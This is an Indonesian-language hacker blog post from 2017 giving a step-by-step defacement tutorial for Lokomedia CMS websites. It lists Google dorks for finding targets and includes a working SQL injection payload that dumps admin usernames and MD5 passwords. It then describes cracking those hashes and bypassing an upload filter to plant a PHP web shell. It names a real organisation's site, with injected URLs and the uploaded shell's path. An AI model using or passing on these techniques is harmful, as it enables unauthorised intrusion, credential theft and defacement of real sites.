Oke gua hari ini mau share Deface Metode Sql Lokomedi.
Sudah Tidak Asing Lagi Di telinga Para Defacer Metode Ini.
Oke langsung saja
Bahan :
> Laptop/Komputer
> Internet
> Dork ? - inurl:hal-visi-misi.html
- inurl:hal-visi-dan-misi.html
- inurl:hal-visi- ext:html
- inurl:hal-tentang- ext:html
- inurl:statis- ext:html
- inurl:statis-1- ext:html
- inurl:statis-2- ext:html
- inurl:statis-3- ext:html
- inurl:profil- ext:html
- inurl:profil-1- ext:html
- inurl:profil-2- ext:html
- inurl:profil-3- ext:html
- inurl:kategori- ext:html
- inurl:hal-tujuan- ext:html
- inurl:hal-struktur- ext:html
- inurl:/adminweb/ site:id
- inurl:/redaktur/ site:id
- inurl:/webadmin/ site:id
- inurl:/master/ site:id
> Shell/Mini Shell (shell dalam bentuk "namashell.phtml.jpg" atau "namashell.php.jpg")
> exploit ? ('union select /*!50000Concat*/(username,0x20,password)+from+users--+--+)
> Untuk Hash password nya pakai ini Disini
> Admin Login nya ? Disini
> Browser Menggunakan Mozila
> Download Tamper Data di Mozila (Kalo tidak tau cara download Tamper Data nya share di google)
Cara Kerja-nya:
1. Buka Browser Mozila nya. Lalu cari taget nya pakai dork di atas.
2. Coba satu persatu web nya, dan saya dah menemukan target nya (http://nurelfalah.or.id/hal-visi-dan-misi-pp.html) Tampilan nya seperti itu target saya.
3. lalu exploit-kan Target Tersebut menjadi (http://nurelfalah.or.id/hal-visi-dan-misi-'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+pp.html)
4. lalu liat di title web tersebut apakah keluar user dan password nya.
5. Kalau keluar tinggal cari Admin Login nya, pakai Admin Login Disini, dan saya telah menemukan Admin Login nya di (http://nurelfalah.or.id/user/)
6. Admin Login nya sudah ketumu tinggal hash password nya. Cara ngambil password nya. web nya "ctrl+c" dan hasil nya seperti ini (view-source:http://nurelfalah.or.id/hal-visi-dan-misi-'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+pp.html)
7. Password nya terletak di samping admin, dan password masih bentuk md5, Kita Hash Password Tersebut Disini
8. Masuk Ke Website tersebut. dan cari tempat upload shell nya. dan saya upload nya di "Gallery Photo" pilih "Tambah Photo" Beri Judul nya asal saja. Buka Tamper Data nya. "alt" Pilih "Tools" Cari Tamper Data nya.
9. Start Tamper, Upload Shell/Mini shell (shell dalam bentuk "namashell.phtml.jpg" atau "namashell.php.jpg") edit name shell nya yg tadi nya ".php.jpg" jadi ".php" .jpg nya di hapus. trus oke. tunggu sampai selesai
10. kalo sudah selesai foto nya bentuk file pecah/retak. lalu kelik kanan "view"
akan seperti ini "http://nurelfalah.or.id/img_galeri/kecil_63eaea.phtml" lalu hapus kecil_ nya menjadi "http://nurelfalah.or.id/img_galeri/63eaea.phtml" Lalu masuk ke shell tersebut.
11. Baru deh kamu edit sesuka hati itu web :)
Sekian Terimakasih :)
#DarkPinusSquad
#2017
#Dapsquad
No comments:
Post a Comment